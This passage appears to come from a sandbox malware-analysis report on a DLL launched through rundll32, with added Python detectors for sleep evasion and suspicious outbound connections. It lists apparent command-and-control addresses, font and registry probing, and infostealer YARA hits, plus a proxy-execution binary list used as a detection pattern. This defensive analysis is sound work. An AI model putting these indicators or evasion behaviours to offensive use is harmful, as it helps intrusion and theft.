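    """Per-thread timing summary plus the user-interaction polling counters."""
    per_thread: Dict[Tuple[str, int], List[int]] = defaultdict(list)
    for proc, tid, ms in parse_sleeps(report):
        per_thread[(proc, tid)].append(ms)
    threads = []
    for (proc, tid), delays in per_thread.items():
        finite = [d for d in delays if d < INDEFINITE_MS]
        threads.append({
            "process": proc, "tid": tid, "sleep_calls": len(delays),
            "total_finite_ms": sum(finite),
            "long_sleeps": sum(1 for d in finite if d >= LONG_SLEEP_MS),
            "indefinite_sleeps": len(delays) - len(finite),
            "resleep_loop": is_resleep_run(delays),
        })
    return {"threads": threads, "user_api": parse_user_api(report)}


if __name__ == "__main__":
    for row in assess(SAMPLE_REPORT)["threads"]:
        print(row)
    print(assess(SAMPLE_REPORT)["user_api"])
```

Feeding it the full report text instead of the embedded sample needs nothing else; the two regexes ignore every line that is not a sleep or Window / User API observation. The per-thread split matters: the two sleeps on TID 6996 are the ones that cross the 3 minute mark, while TID 7424 carries the sentinel delays and the decreasing run.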

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 88.198.193.213 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 35.201.97.85 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.26.13.205 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 3.33.130.190 80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: Shell_TrayWnd
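The four Network Connect lines above show rundll32.exe, a signed Windows binary, initiating outbound connections, which is the behaviour behind the "System process connects to network" signature. The following is an added example, not from the Joe Sandbox report and not from the Quasar project, of the same check run over endpoint telemetry: constructed events in the shape of Sysmon Event ID 3 (NetworkConnect) fields, a set of proxy-execution binaries that rarely need internet access, and the report's four destinations reused as an IOC list. The binary set, the simplified event shape (a boolean Initiated field) and the benign sample events are assumptions for this example.

```python
import ipaddress
from typing import Dict, List

# Windows binaries that seldom have a legitimate reason to open internet connections
# on their own (assumption for this example; tune to the environment).
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "regasm.exe", "installutil.exe"}

# The four destinations recorded in the report above, reused here as an IOC list.
REPORT_IOCS = {("88.198.193.213", 80), ("35.201.97.85", 443),
               ("104.26.13.205", 80), ("3.33.130.190", 80)}

# Constructed events in the shape of Sysmon Event ID 3 (NetworkConnect) fields.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "88.198.193.213", "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "35.201.97.85", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "104.26.13.205", "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "3.33.130.190", "DestinationPort": 80, "Initiated": True},
    # benign: rundll32 talking to a printer on the LAN
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "10.0.0.23", "DestinationPort": 9100, "Initiated": True},
    # benign: a browser talking to the internet
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "DestinationIp": "93.184.216.34", "DestinationPort": 443, "Initiated": True},
    # an accepted inbound connection, not one rundll32 initiated
    {"Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "203.0.113.7", "DestinationPort": 4444, "Initiated": False},
    # a binary borrowing the name from outside System32: masquerading candidate
    {"Image": r"C:\Users\user\AppData\Roaming\rundll32.exe", "DestinationIp": "198.51.100.9", "DestinationPort": 8080, "Initiated": True},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, object]) -> List[str]:
    """Reasons this event is suspicious; an empty list means it passes."""
    reasons: List[str] = []
    if not event["Initiated"]:
        return reasons                      # only outbound connections matter here
    image = str(event["Image"])
    name = basename(image)
    if name not in PROXY_BINARIES:
        return reasons
    if not image.lower().startswith(SYSTEM_DIRS):
        reasons.append(f"{name} running from outside System32/SysWOW64")
    ip = ipaddress.ip_address(str(event["DestinationIp"]))
    if ip.is_global:                        # excludes RFC 1918, loopback, link-local, reserved
        reasons.append(f"{name} initiated a connection to public address {ip}")
    if (str(ip), event["DestinationPort"]) in REPORT_IOCS:
        reasons.append("destination matches an IOC from the sandbox report")
    return reasons


def detect(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    alerts = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            alerts.append({"image": ev["Image"],
                           "dst": f"{ev['DestinationIp']}:{ev['DestinationPort']}",
                           "reasons": reasons})
    return alerts


def extract_iocs(alerts: List[Dict[str, object]]) -> List[str]:
    """Sorted ip:port strings for alerts that hit the report's IOC list."""
    return sorted({str(a["dst"]) for a in alerts if any("IOC" in r for r in a["reasons"])})


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["image"], "->", a["dst"], "|", "; ".join(a["reasons"]))
```

The LAN printer connection and the inbound connection produce no alert, the browser is ignored because it is not in the proxy-binary set, and the copy of rundll32.exe under AppData is flagged on its path alone even though its destination is not a public address. Public-destination hits without an IOC match are the ones worth triaging in an environment where the report's addresses are not yet blocked.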
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation (observed 14 times)
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation (observed 4 times)
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match  File source: vstdlib_s64.dll.dll, type: SAMPLE
Source: Yara match  File source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.rundll32.exe.1fbe5a90000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 6.2.rundll32.exe.1c4bec00000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 7.2.rundll32.exe.2755e650000.0.unpack, type: UNPACKEDPE
